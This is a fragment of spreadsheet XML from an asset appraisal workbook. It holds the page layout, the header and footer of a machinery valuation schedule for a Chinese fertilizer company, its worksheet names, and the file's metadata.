    <mergeCell ref="F5:F6"/>
    <mergeCell ref="G5:G6"/>
    <mergeCell ref="H5:H6"/>
    <mergeCell ref="I5:I6"/>
    <mergeCell ref="J5:J6"/>
    <mergeCell ref="K5:K6"/>
  </mergeCells>
  <pageMargins left="0.719444444444444" right="0.579861111111111" top="1.82986111111111" bottom="0.679861111111111" header="0.929861111111111" footer="0.379861111111111"/>
  <pageSetup paperSize="9" scale="75" orientation="landscape" horizontalDpi="600"/>
  <headerFooter alignWithMargins="0" scaleWithDoc="0">
    <oddHeader>&amp;L&amp;10
被评估单位（或者产权持有单位）：晋煤冀州银海化肥有限责任公司&amp;C&amp;"黑体,常规"&amp;18固定资产—机器设备评估明细表&amp;"宋体,常规"&amp;12
&amp;10评估基准日：2016年10月31日&amp;R&amp;10
表4-6-4
金额单位：人民币元</oddHeader>
    <oddFooter>&amp;L&amp;10评估单位:衡水正财资产评估有限公司&amp;C&amp;10评估人员：于红兵 郑国建 吴洁 贾佳 王文祥 程艳菊</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MXYIBKADTBBVIW</vt:lpstr>
      <vt:lpstr>尿素车间</vt:lpstr>
      <vt:lpstr>电力</vt:lpstr>
      <vt:lpstr>仪表</vt:lpstr>
      <vt:lpstr>氰尿酸</vt:lpstr>
      <vt:lpstr>化工</vt:lpstr>
      <vt:lpstr>甲醇</vt:lpstr>
      <vt:lpstr>水汽</vt:lpstr>
      <vt:lpstr>原料</vt:lpstr>
      <vt:lpstr>在库备品备件</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123</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">1996-12-17T01:32:42Z</dcterms:created>
  <cp:lastPrinted>2017-03-02T01:26:53Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-03-11T02:44:34Z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2052-10.1.0.6260</vt:lpwstr>
  </property>
</Properties>
</file>